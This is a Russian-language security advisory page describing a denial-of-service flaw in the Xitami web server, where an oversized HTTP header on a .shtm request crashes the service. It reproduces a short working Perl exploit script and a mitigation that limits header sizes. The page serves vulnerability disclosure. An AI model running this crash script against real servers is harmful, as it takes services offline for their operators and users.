Дата публикации: | 23.09.2003 |
Всего просмотров: | 1593 |
Опасность: | Средняя |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: - Xitami 2.5B4 (bw3225b4.exe),
Xitami 2.4D9 (bw3224d9.exe).
Описание: Уязвимость обнаружена в Xitami Web сервере. Удаленный атакующий может аварийно завершить работу Web сервера. Удаленный атакующий может послать http get запрос к .shtm файлу с http заголовком размером более 5154 байт, за которым следует “:”, чтобы аварийно завершить работу Xitami с ошибкой Microsoft Visual C++ Runtime Error в XIWIN32.EXE.
#!/usr/local/bin/perl # # Simple exploit for Imatix Xitami Webserver on Windows NT # # Sending a GET request for a *.shtm file with a header field of >= 5154 bytes, followed by a ":", # will crash the service. # # Vulnerable versions: # - Xitami 2.5B4 (bw3225b4.exe) # - Xitami 2.5B4 (bs3225b4.exe) # - Xitami 2.4D9 (bw3224d9.exe) # - others? # # For legal purposes only ! # # 22.09.2003 - Oliver Karow - oliver.karow[AT]gmx.de use IO::Socket; $ip="127.0.0.1"; $port=80; $var="A" x 5157; $mySocket=IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$ip, PeerPort=>$port, Timeout=>5); $mySocket->autoflush(1); print $mySocket "GET /test.shtm HTTP/1.0\r\n". $var.": */*\r\n\r\n"; @answer=<$mySocket>; $length=@answer; if ($length==0){die "\nService killed!\n";} print @answer;Возможно версии под другие платформы, отличные от Windows, также уязвимы. URL производителя: http://www.ximati.com Решение:Ограничьте максимальные размеры HTTP заголовков в HTTP прокси. |
|
Ссылки: | Denial of service vulnerability in Xitami Open Source Web Server |